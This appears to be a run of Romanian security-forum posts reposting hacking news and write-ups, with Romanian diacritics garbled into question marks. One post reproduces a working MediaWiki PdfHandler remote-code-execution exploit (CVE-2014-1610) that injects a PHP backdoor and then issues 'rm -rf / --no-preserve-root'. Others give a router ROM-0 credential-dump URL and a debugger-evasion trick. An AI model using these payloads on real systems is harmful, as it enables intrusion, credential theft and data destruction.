Nytro

Toate aceste topicuri sunt de "Ajutor". Aveti deja o categorie pentru asa ceva. Cand o sa vad 2-3 articole postate de voi pe aceasta tema, dar nu probleme ale voastre la care asteptati o rezolvare, voi lua in considerare aceasta sugestie.

Aratati-mi cate 5 posturi facute de voi pe aceasta tema.

Da link.

Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? Publicat de Andrei Av?d?nei O echip? european? de fizicieni au demonstrat cum un aparat poate teleporta informa?ie cuantic? c?tre un spa?iu de stocare SSQ(Solid-State Quantum) printr-o fibr? telecom, o capabilitate crucial? în viitorul internetului cuantic. Ce înseamn? teleportare cuantic?? Teleportarea cuantic? este capacitatea de a transmite ceva dintr-o loca?ie în alta f?r? a traversa spa?iul dintre cele dou?. Materia în sine nu realizeaz? c?l?toria, doar informa?ia ce o descrie. Aceasta este transmis? c?tre un corp nou ce preia identitatea originalului. Articol complet: Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? | WORLDIT

Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software Aurelian Mihai - 11 feb 2014 Viitoarele genera?ii de tablete ?i telefoane Samsung ar putea include o func?ie de monitorizare care înregistreaz? cu lux de am?nunte modul în care sunt folosite dispozitivele cu sistem Android. Identificat dup? numele Context, serviciul de monitorizare rezident în memoria dispozitivelor Samsung cu sistem Android va urm?ri permanent modul de folosire a aplica?iilor instalate ?i datele furnizate de senzorii telefonului. Suplimentar, vor fi colectate informa?ii despre preferin?ele utilizatorilor înregistrând cuvintele tastate pe ecran. Mai departe, Samsung ar putea pune informa?iile colectate la dispozi?ia dezvoltatorilor de aplica?ii pentru Android, cu scopul de a-i ajuta s? aduc? îmbun?t??iri ce r?spund mai bine nevoilor utilizatorilor. Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu produc?torii de aplica?ii pentru Android Desigur, serviciul Context va avea un rol ?i pentru majorarea veniturilor din publicitate, adaptând reclamele afi?ate în func?ie de interesele utilizatorilor. Spre exemplu, dup? o c?utare dup? re?ete de buc?t?rie am putea fi bombarda?i cu reclame pentru restaurante care servesc produsul respectiv gata preparat. Potrivit zvonurilor, introducerea serviciului Context a fost amânat? temporar, dup? ce o analiz? mai atent? a scos la iveal? temeri privind efectele negative pe care m?sura le-ar putea avea asupra vânz?rilor de telefoane Samsung. Via:Theverge.com Sursa: Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software

Via Andrei

https://www.youtube.com/watch?v=fvxqnQmahTA

Stergeti cookie-urile de la Yahoo si incercati din nou.

Eu voi participa atat la dezvoltarea scirptului PHP cat si la crearea challenge-urilor. La design nu pot ajuta.

Salut, In urma unei sugestii am decis ca ar fi o idee buna sa avem propriul portal CTF (Capture The Flag). Pentru cei care nu cunosc acest termen, CTF este un concurs unde participantii trebuie sa rezolve cat mai multe probleme si primesc puncte in functie de dificultatea acestora. Domeniile pe care problemele pot sa le acopere sunt foarte variate: hacking, steganografie, criptografie, programare, algoritmica si multe altele. Pentru dezvoltarea acestui proiect avem nevoie de persoane capabile sa: 1. dezvolte astfel de probleme (de preferat persoane care au participat la astfel de competitii si Hertz) 2. dezvolte un script PHP/MySQL, bine structurat, OOP, pentru managementul utilizatorilor si al challenge-urilor (cu experienta) 3. designeri pentru acest portal (Javascript/jQuery, CSS3, HTML5) Cei care au posibilitatea de a contribui la acest proiect sunt rugati sa imi dea PM sau sa posteze aici. De asemenea am dori sa oferim premii celor care ocupa primele locuri la finalul competitiei (un termen limita). Cu aceasta ocazie, cine are posibilitatea de a dona atat bani, cat si diverse licente sau servicii, e rugat sa imi dea un PM. Peste cateva zile, in functie de numarul persoanelor interesate, vom pune lucrurile in miscare. Astept PM sau postati aici (de preferat) daca puteti ajuta.

Sa nu va plangeti ca ati luat teapa ca aveti ban. Minim 50 de posturi pentru astfel de afaceri.

Unde mai e anonimitatea daca persoana cu care vorbesti iti stie IP-ul?

Da, stiu, RC4 are NISTE probleme, de aceea am spus ca cine il "sparge" are VIP. Pacat ca nu prea se mai foloseste.

RSA 4096 + AES 256 GCM. Am mai multa incredere in RSA decat in curbele eliptice. Mod de functionare: 1. Client -> Server (handshake, validare certificat server, validare certificat client) 2. Server -> Client 2 (la fel) 3. Client -> Client 2 (serverul actioneaza doar ca router. Se face handshake si se fac verificari de certificate pe clienti) Serverul va avea un CA pe baza caruia se va verifica certificatul acestuia. Fiecare user isi va genera propriul CA si cumva, il va oferi utilizatorului cu care doreste sa comunice. Validarea certificatelor se va face pe baza acestui certificat. ps-axl, tu de ce te vei ocupa? PS: Se poate opta pentru certificate platite, semnate de un root CA. Astfel, un user care are un site, www.vasile.com, isi ia certificat pentru acel site si certificatul e ulterior validat pe baza root CA-ului de care a fost semnat. In cazul acesta, root CA-ul este public si "transmiterea" acestuia este mult mai simpla. PS2: Astept de la cel care a zis ca SSL poate fi spart sa imi faca un demo cu RC4 cu cheia pe 56 de biti si sunt multumit, are VIP. Daca imi face un demo cu AES 128 bit si RSA 1024 bit are Administrator.

In sfarsit o idee buna. Hertz, tu ce parere ai?

Hacking and patching TP-LINK TD-W8901G router By piotrbania.com / 31.01.2014 Motivation Recently a critical vulnerability has been found in TP-LINK routers and few other router devices. This particular vulnerability to which I am referring was described here. Basically it is so called ROM-0 attack. In short attacker by requesting ROM-0 through HTTP request (ie. http://192.168.1.1/ROM-0) can download all important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I have decided to patch the vulnerability by myself. DISCLAIMER: Author takes no responsibility for any actions with provided informations or codes. Your are doing everything on your own responsibility. The list of vulnerable devices is presented below: TD-W8901G TD-8816 TD-W8951ND TD-W8961ND D-Link DSL-2640R ADSL Modem AirLive WT-2000ARM Pentagram Cerberus P 6331-42 ZTE ZXV10 W300 I had one of those devices (TD-W8901G) and I took this as a good fortune sign to start playing with hardware router hacking . My task was to patch this vulnerability and make the ROM-0 not downloadable. This was my pretty much first encounter with this type of stuff (and my first encounter with MIPS really). At this point I would like to thank hackerfantastic and robercik for some hardware hints. Serial connection Most of the routers (or embedded devices in general) have some sort of communication port designed to aid the manufactures with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I have found the serial port instead (presented on images below). First of all this is some ugly ass soldering work (yes I did that). Ok now getting back to my initial point I have used PL2303 RS232<>USB converter to connect the serial port to the usb port of my computer. Putty is pretty decent for handling normal serial communication so I have used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my putty but unfortunately I got nothing. So after some digging around and harassing few friends (ohayo!) I have found out that my voltage levels on RX and TX pins were too low (should be 3.3V). So after some further digging and looking on schematics of this board it became obvious that two resistors are missing (see image above). So I took a piece of wire and I have connected the empty pins together (in two places obviously). So now the voltage levels were correct and I was able to see the output in my terminal. Articol complet: PIOTRBANIA.COM :: Hacking and patching TP-LINK TD-W8901G router

[h=3]The registration marathon is now live![/h] https://olympic-ctf.ru/register

Mobile Pwn2Own Autumn 2013 Chrome on Android Exploit Writeup ianbeer@chromium.org tl?dr Pinkie Pie exploited an integer overflow in V8 when allocating TypedArrays, abusing dlmalloc inline metadata and JIT rwx memory to get reliable code execution. Pinkie then exploited a bug in a Clipboard IPC message where a renderersupplied pointer was freed to get code execution in the browser process by spraying multiple gigabytes of sharedmemory. Download: https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit

MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) From: Pichaya Morimoto <pichaya () ieee org> Date: Sat, 1 Feb 2014 22:28:51 +0700 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 #################################################################### # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # #################################################################### # Exploit: #################################################################### 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "<?php%20system(\\$_GET[1]);">https://rstforums.com/forum/images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: #################################################################### thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php includes/filerepo/file/File.php # Vulnerability Analysis: #################################################################### 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image <? ... 1.1 Called directly, use $_GET params wfThumbHandleRequest(); 1.2 Handle a thumbnail request via query parameters function wfThumbHandleRequest() { $params = get_magic_quotes_gpc() ? array_map( 'stripslashes', $_GET ) : $_GET; wfStreamThumb( $params ); // stream the thumbnail } 1.3 Stream a thumbnail specified by parameters function wfStreamThumb( array $params ) { ... $fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts uploaded.pdf file here ... // Backwards compatibility parameters if ( isset( $params['w'] ) ) { $params['width'] = $params['w']; // << Inject os cmd here! unset( $params['w'] ); } ... $img = wfLocalFile( $fileName ); ... // Thumbnail isn't already there, so create the new thumbnail... $thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php <? ... function transform( $params, $flags = 0 ) { ... $handler = $this->getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php <? ... function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) { ... $width = $params['width']; ... $cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd & parameters $cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page} -dLastPage={$page}"; $cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg( $srcPath ); $cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor ); $cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell argument $cmd .= wfEscapeShellArg( $dstPath ) . ")"; $cmd .= " 2>&1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits <? ... function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits = array() ) { ... passthru( $cmd, $retval ); // << Execute here!! POC: GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php` HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=op3h2huvddnmg7gji0pscfsg02 <html><head><title>Error generating thumbnail</title></head> <body> <h1>Error generating thumbnail</h1> <p> ?????????????????????????????: /bin/bash: -: command not found<br /> convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.<br /> GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br /> </p> </body> </html> GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 uid=33(www-data) gid=33(www-data) groups=33(www-data) # Back-end $cmd #################################################################### GlobalFunctions.php : wfShellExec() cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "<?php system(\\$_GET[1]);">images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1 Sursa: Full Disclosure: MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

[h=3]MS Word 2013 Reading Locations[/h]Microsoft Office 2013 introduced a new feature that allows a user to continue reading or editing a document starting at the last point he or she was working. This feature, referred to by some as "pick up where you left off", is a convenient way to jump to the location within a document that Word believes was being read or edited most recently before a file was closed. After opening a document and being greeted with the prompt pictured above, I was curious as to where this information is being tracked. After a bit of investigation, I located a set of registry subkeys specific to Office 2013 where this information is stored. When a document in Word 2013 is closed, a registry subkey is created or updated in the "Software\Microsoft\Office\15.0\Word\Reading Locations" subkey of the current user's NTUSER.DAT. The subkey created should be named something similar to "Document 0", "Document 1", "Document 2", etc., as the number appended to the name of each subkey is incremented by one when a new document is closed. Each "Document #" subkey should contain 3 values that may be of interest to an examiner: "Datetime", "File Path", and "Position". All three values are stored as null-terminated Unicode strings. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Screenshot of Reading Locations Subkey[/TD] [/TR] [/TABLE] Datetime Value The Datetime value corresponds to the local date and time the file was last closed. This value data is displayed in the format YYYY-MM-DD, followed by a "T", then HH:MM. File Path Value The File Path value is the fully qualified file name. Position Value The Position value appears to store the positioning data used to place the cursor at the point in the document "where you left off". It appears that the second number in this value data is used to denote the location within the document. For example, if a file is opened for the first time and then closed again without scrolling down through the document, the Position value data should be "0 0". If a file is opened and the user scrolls down a bit through the document before closing it, the Position value data may be something like "0 1500". The second number in this value data appears to increase as the user scrolls through (i.e. reads/edits) the document. Note that positioning of the cursor does not seem to have an impact on this value. That is, the second field in this value data increases even if the cursor is never moved from the beginning of the document. [h=4]Forensic Implications[/h] Fifty unique files (based on fully qualified file name) can be tracked in the Reading Locations subkeys. Each time a document in Word 2013 is closed, regardless of the version of Word that created the file, a Reading Locations subkey should be added or updated. It should be noted, however, that files accessed from a user's SkyDrive do not appear to be tracked in the Reading Locations subkey. If the file referenced by the "File Path" value data of any subkey is opened and closed again, the corresponding value data is updated, however, the organization of the "Document #" subkeys remains unchanged (i.e. "Document 0" is not shifted to "Document 1", etc.). Interestingly, it appears that when the 51st document is opened, the "Document 49" subkey is overwritten, leaving data from the other subkeys untouched. This LIFO rotation may have some interesting effects on examination, as it lends itself to preserving more historical data while recent activity is more likely to be overwritten. Posted by Jason Hale at 11:51 PM Sursa: Digital Forensics Stream: MS Word 2013 Reading Locations

Yahoo Hacked And How To Protect Your Passwords James Lyne, Contributor Yahoo yesterday announced that Yahoo mail has been the focus of a co-ordinated hack and that at this time it has confirmed a number of users e-mail accounts have been compromised – you may be one of them (and if you are see below for my top tips on how to secure your passwords going forward). It is not clear how many users have been compromised, or exactly how. Yahoo don’t have a history of providing much information but it would be prudent for any Yahoo mail users to take precautions (more on that below). Between the vague statements about malicious code and “a third party was probably to blame” Yahoo has been resetting the credentials of affected users via e-mail and SMS if your mobile is on file. Whilst details are scarce at this time this continues a trend of bad security and resilience news for Yahoo who experienced a multitude of issues in 2013. The company made clear in their announcement that a third party database with shared credentials was likely the source and that they had no evidence the usernames and passwords were taken directly form their systems. Whether the third party was one they provided data to, or whether it was a random third party with shared credentials is not particularly clear. There is insufficient detail to lay blame at this time, but certainly it would be prudent to take steps to secure yourself. More broadly, the last couple of years have seen a significant spike in the theft of passwords (or their hashed or encrypted representations) from online services as cyber criminals moved beyond financial information as their sole form of profit. Whilst we all wait with bated breath for further details of the compromise now would be a very good time to upgrade your password. Many providers are very behind the time on password security, but at least you can take steps to minimise the risks. Here are a few tips on how to do it: Avoid using the same password across multiple sites and services. That way, if Yahoo credentials are breached hackers won’t be able to jump across in to your Twitter, online banking, work accounts or alike. I know this presents a memory challenge for some users, but see the below tip on password managers. Choose a password which is not easy to guess. Words with a dictionary root followed by numerals are very common choices and predictable patterns that cyber criminals can use to crack your password very fast. Passwords should be long, phrase based and involve a balance of different types of characters – numbers, letters, capitols and ideally a few symbols. See my fabulous example below. Set up password change/reset mechanisms properly – not obviously. Password reset forms on many services ask questions like “Where did you go to school?” or “In which year were you born?”. These questions are easy to answer and can typically be mined from social media pages or the Internet — why would hackers guess your password if they can just tell a system where you went to school and how old you are (you did after all announce your birthday last year on Twitter and your age, didn’t you?). Instead I suggest lying on the Internet. Come up with a scheme of answers to these questions that you won’t forget (or store securely) or better still, if the service allows, specify your own difficult questions. Bigger = better! When passwords are stolen from providers they are typically in a hashed or encrypted form, a bit like this ’5f4dcc3b5aa765d61d8327deb882cf99?. This is a hashed password representation and using clever techniques and computing power attackers can reverse the original password and log in to your account. When they steal these hashes it is only a matter of time and effort until they reveal the original. Short passwords might be guessed in second to minutes or hours (it depends on the implementation), where very long passwords could take years of work (and the cyber criminals are likely to go after someone else). Therefore making your password 60 characters makes life much harder for the cyber criminals if they do manage to break in to a service like Yahoo. This of course all assumes the provider isn’t just storing your password in clear text – in which case you will be very glad of tip number 1! Use a password manager. Password managers generate strong unique passwords for each of your services and then store them in an encrypted database which you can unlock with one good master password. It is a reasonable compromise for those that do not have an amazing memory but don’t want to fall in to the pitfall of repeating similar passwords across multiple sites. See below for more information on how this works. Register to a breach monitoring service. There are a variety of services on the Internet now which monitor for visible lists of stolen usernames/passwords. Of course, not all breaches are visible so it is far from a complete list. That said, if your username shows up it will e-mail you a notification and tell you it is time to change. Despite numerous proposals of authentication mechanisms to replace the password it is still the cheapest, easiest to deploy ubiquitous form of authentication used. So we should all take some steps to make sure we are using them properly. A good password manager allows you to generate secure passwords for each of your sites and avoid duplication — luckily you don’t have to type these beastly long passwords out, the tools do that for you. Here is an example of a password recipe for a new password: A password recipe for a new password courtesy of 1Password for Mac OS X You can specify the length of the password (some providers don’t allow unlimited length but arbitrarily restrict you to say 16 characters e.g. Microsoft 365 exchange. Grumble grumble.) and the make up of symbols and numbers. You can even make it pronounceable for a situation where you might have to actually read the password out (though I don’t recommend this for obvious reasons). Each time you click the button you get a nice new secure password which the password manager automatically associates with the website in question so that you can auto log in each time remembering just one secure password you specify. Not all password managers are created equal so it is worth shopping around a little before you commit, but these tools can take the average users password security from poor to really rather good in an afternoon password changing party. Lastly, it is important you keep a back up of the password encrypted database (loosing all your passwords in one place would be painful) and you may want to think twice about putting the keys to your whole life in there – my banking details for example would not be in this application. So why not make something good from another password breach and share these tips with your friends, family and colleagues. I await with baited breath news from a reader that they’ve successfully made all their passwords over 128 characters. Sursa: Yahoo Hacked And How To Protect Your Passwords - Forbes

XSS and MySQL FILE Difficulty Beginner Details This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. What you will learn? Cross-Site Scripting exploitation MySQL injection with FILE privilege Requirements A computer with a virtualisation software A basic understanding of HTTP A basic understanding of PHP Yes, that's it! Download xss_and_mysql_file.pdf (579K) xss_and_mysql_file.iso (64-bit, 189M, MD5: e95459511a4aebb51d0de6cd04a016df) xss_and_mysql_file_i386.iso (32-bit, 178M, MD5: c9c7a31ab9bf79b82b72b58bb0a3a657) Sursa: https://pentesterlab.com/exercises/xss_and_mysql_file/

Reversing the WRT120N’s Firmware Obfuscation By Craig | February 2, 2014 It was recently brought to my attention that the firmware updates for the Linksys WRT120N were employing some unknown obfuscation. I thought this sounded interesting and decided to take a look. The latest firmware update for the WRT120N didn’t give me much to work with: Binwalk firmware update analysis As you can see, there is a small LZMA compressed block of data; this turned out to just be the HTML files for the router’s web interface. The majority of the firmware image is unidentified and very random. With nothing else to go on, curiosity got the best of me and I ordered one (truly, Amazon Prime is not the best thing to ever happen to my bank account). Hardware Analysis A first glance at the hardware showed that the WRT120N had a Atheros AR7240 SoC, a 2MB SPI flash chip, 32MB of RAM, and what appeared to be some serial and JTAG headers: WRT120N PCB Looking to get some more insight into the device’s boot process, I started with the serial port: UART Header I’ve talked about serial ports in detail elsewhere, so I won’t dwell on the methods used here. However, with a quick visual inspection and a multimeter it was easy to identify the serial port’s pinout as: Pin 2 – RX Pin 3 – TX Pin 5 – Ground The serial port runs at 115200 baud and provided some nice debug boot info: $ sudo miniterm.py /dev/ttyUSB0 115200 --- Miniterm on /dev/ttyUSB0: 115200,8,N,1 --- --- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H --- ======================================================================= Wireless Router WG7005G11-LF-88 Loader v0.03 build Feb 5 2009 15:59:08 Arcadyan Technology Corporation ======================================================================= flash MX25L1605D found. Copying boot params.....DONE Press Space Bar 3 times to enter command mode ... Flash Checking Passed. Unzipping firmware at 0x80002000 ... [ZIP 3] [ZIP 1] done In c_entry() function ... install_exception install exception handler ... install interrupt handler ... ulVal: 0x484fb Set GPIO #11 to OUTPUT Set GPIO #1 to OUTPUT Set GPIO #0 to OUTPUT Set GPIO #6 to INPUT Set GPIO #12 to INPUT Timer 0 is requested ##### _ftext = 0x80002000 ##### _fdata = 0x80447420 ##### __bss_start = 0x804D5B04 ##### end = 0x81869518 ##### Backup Data from 0x80447420 to 0x81871518~0x818FFBFC len 583396 ##### Backup Data completed ##### Backup Data verified [INIT] HardwareStartup .. [INIT] System Log Pool startup ... [INIT] MTinitialize .. CPU Clock 350000000 Hz init_US_counter : time1 = 270713 , time2 = 40272580, diff 40001867 US_counter = 70 cnt1 41254774 cnt2 41256561, diff 1787 Runtime code version: v1.0.04 System startup... [INIT] Memory COLOR 0, 1600000 bytes .. [INIT] Memory COLOR 1, 1048576 bytes .. [INIT] Memory COLOR 2, 2089200 bytes .. [INIT] tcpip_startup .. Data size: 1248266 e89754967e337d9f35e8290e231c9f92 Set flash memory layout to Boot Parameters found !!! Bootcode version: v0.03 Serial number: JUT00L602233 Hardware version: 01A ... The firmware looked to have been made by Arcadyan, and the ‘Unzipping firmware…’ message was particularly interesting; a bit of Googling turned up this post on reversing Arcadyan firmware obfuscation, though it appears to be different from the obfuscation used by the WRT120N. The only interaction with the serial port was via the bootloader menu. During bootup you can break into the bootloader menu (press the space bar three times when prompted) and perform a few actions, like erasing flash and setting board options: Press Space Bar 3 times to enter command mode ...123 Yes, Enter command mode ... [WG7005G11-LF-88 Boot]:? ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== Unfortunately, the bootloader doesn’t appear to provide any options for dumping the contents of RAM or flash. Although there is a JTAG header on the board, I opted for dumping the flash chip directly since JTAG dumps tend to be slow, and interfacing directly with SPI flash is trivial. Pretty much anything that can speak SPI can be used to read the flash chip; I used an FTDI C232HM cable and the spiflash.py utility included with libmpsse: $ sudo spiflash --read=flash.bin --size=$((0x200000)) --verify FT232H Future Technology Devices International, Ltd initialized at 15000000 hertz Reading 2097152 bytes starting at address 0x0...saved to flash.bin. Verifying...success. The flash chip contains three LZMA compressed blocks and some MIPS code, but the main firmware image is still unknown: Flash analysis The first two blocks of LZMA compressed data are part of an alternate recovery image, and the MIPS code is the bootloader. Besides some footer data, the rest of the flash chip simply contains a verbatim copy of the firmware update file. Bootloader Analysis The bootloader, besides being responsible for de-obfuscating and loading the firmware image into memory, contains some interesting tidbits. I’ll skip the boring parts in which I find the bootloader’s load address, manually identify standard C functions, resolve jump table offsets, etc, and get to the good stuff. First, very early in the boot process, the bootloader checks to see if the reset button has been pressed. If so, it starts up the “Tiny_ETCPIP_Kernel” image, which is the small LZMA-compressed recovery image, complete with a web interface: Unzipping Tiny Kernel This is nice to know; if you ever end up with a bad firmware update, holding the reset button during boot will allow you to un-brick your router. There is also a hidden administrator mode in the bootloader’s UART menu: Hidden bootloader menu Entering an option of ! will enable “administrator mode”; this unlocks a few other options, including the ability to read and write to memory: [WG7005G11-LF-88 Boot]:! Enter Administrator Mode ! ====================== [U] Upload to Flash [E] Erase Flash [G] Run Runtime Code [M] Upload to Memory [R] Read from Memory [W] Write to Memory [Y] Go to Memory [A] Set MAC Address [#] Set Serial Number [V] Set Board Version [H] Set Options [P] Print Boot Params [I] Load ART From TFTP [1] Set SKU Number [2] Set PIN Number ====================== [WG7005G11-LF-88 Boot]: The most interesting part of the bootloader, of course, is the code that loads the obfuscated firmware image into memory. Obfuscation Analysis De-obfuscation is performed by the load_os function, which is passed a pointer to the obfuscated image as well as an address where the image should be copied into memory: The de-obfuscation routine inside load_os is not complicated: De-obfuscation routine Basically, if the firmware image starts with the bytes 04 01 09 20 (which our obfuscated firmware image does), it enters the de-obfuscation routine which: Swaps the two 32-byte blocks of data at offsets 0×04 and 0×68. Nibble-swaps the first 32 bytes starting at offset 0×04 Byte-swaps each of the adjacent 32 bytes starting at offset 0×04 At this point, the data at offset 0×04 contains a valid LZMA header, which is then decompressed. Implementing a de-obfuscation tool was trivial, and the WRT120N firmware can now be de-obfuscated and de-compressed: $ ./wrt120n ./firmware/FW_WRT120N_1.0.07.002_US.bin ./deobfuscated.bin Doing block swap... Doing nibble-swap... Doing byte-swap... Saving data to ./deobfuscated.bin... Done! Analysis of de-obfuscated firmware The de-obfuscation utility can be downloaded here for those interested. Sursa: Reversing the WRT120N’s Firmware Obfuscation - /dev/ttyS0

Anti-Debugging trick : Checking for the Low Fragmentation Heap Hi everyone, I’ll introduce you today a Anti-debugging trick which the idea came across my mind while debugging Windows Heap, I don’t know if it was used before anywhere but here I am showing it today. Check the C/C++ source code : [C++] LFH anti-debugging trick - Pastebin.com Short introduction to the Windows front end allocator : First of all let me define what a LFH (low fragmentation heap) is : The LFH was introduced in Windows XP and Windows Server 2003 but it wasn’t used as a default front end allocator until Windows Vista. The default front end allocator were the lookaside lists (LAL) , each of these 2 is a singly linked list with 128 entries. The LFH as its name describes is implemented to guarantee that heap fragmentation will be reduced and it’s strongly recommended to use for application that allocate a big number of small size blocks. When the LFH is created first, predetermined sizes of memory will be allocated and put into buckets (LFH entries), when the application will call for an allocation the LFH will provide the smallest available block to satisfy the allocation , otherwise the request will be passed into the heap manager then to the Freelists (check explanation later). When LAL is used as a front end allocator, a block won’t reside in a list of its list until it was allocated either from the FreeLists or by committing memory then freed. All that won’t apply until a list of the lookaside table can handle the freed block otherwise it will passed to the Heap manager to perform coalescing if two adjacent blocks are free, change bitmap values, invalidate coalesced block entry then insert the coalesced block into its valid list in the FreeLists. If no block coalescing is possible the block is inserted directly in the FreeLists. Anti-Debugging Trick : I noticed that when the executable is run under a debugger no Low Fragmentation Heap (LFH) is created for it so the pointer to the LFH equals NULL. So we’ll just have to check if the pointer to LFH is null to detect if the process was created inside a debugger. I tried after to run the process outside the debugger then attach it and I noticed that a LFH is created for the heap and the pointer to the LFH is valid. The pointer to the LFH is located at “heap_handle+0xd4” under Windows 7 for 32-bit executables and at “heap_handle+0×178” for 64-bit executable. I attached the debugger to the process : 0:001> dt _HEAP 00460000 ntdll!_HEAP +0×000 Entry : _HEAP_ENTRY +0×008 SegmentSignature : 0xffeeffee +0x00c SegmentFlags : 0 [...] +0x0d0 CommitRoutine : 0x5b16148e +0x0d4 FrontEndHeap : 0x00468cf0 Void <– Pointer to the FEA +0x0d8 FrontHeapLockCount : 0 +0x0da FrontEndHeapType : 0×2 <– Type : LFH +0x0dc Counters : _HEAP_COUNTERS +0×130 TuningParameters : _HEAP_TUNING_PARAMETERS When running the process from the debugger LFH won’t be enabled : 0:001> dt _HEAP 00320000 ntdll!_HEAP +0×000 Entry : _HEAP_ENTRY +0×008 SegmentSignature : 0xffeeffee +0x00c SegmentFlags : 0 [...] +0x0cc LockVariable : 0×00320138 _HEAP_LOCK +0x0d0 CommitRoutine : 0x6d58ec0e long +6d58ec0e +0x0d4 FrontEndHeap : (null) +0x0d8 FrontHeapLockCount : 0 +0x0da FrontEndHeapType : 0 +0x0dc Counters : _HEAP_COUNTERS +0×130 TuningParameters : _HEAP_TUNING_PARAMETERS Remember that, The LFH isn’t used by default until Windows Vista and posterior versions , so to implement the anti-debugging technique under Windows XP we’ll need to enable the LFH as it’s not used by default, to do so you’ll simply need to call HeapSetInformation with the HEAP_INFORMATION_CLASS set to ’0? and with the pointer to the information buffer pointing to “0×2? which will enable the LFH for the heap passed as the first argument. A simple way to bypass this technique is simply by attaching the debugger to the application instead of running it from a debugger . More details on the LFH : here Thanks for your time Souhail Hammou. Sursa: ITSecurity.ma – Information Security and Ethical Hacking Community Anti-Debugging trick : Checking for the Low Fragmentation Heap - ITSecurity.ma - Information Security and Ethical Hacking Community

[h=4]Python Arsenal for Reverse Engineering[/h]Link: Python arsenal for RE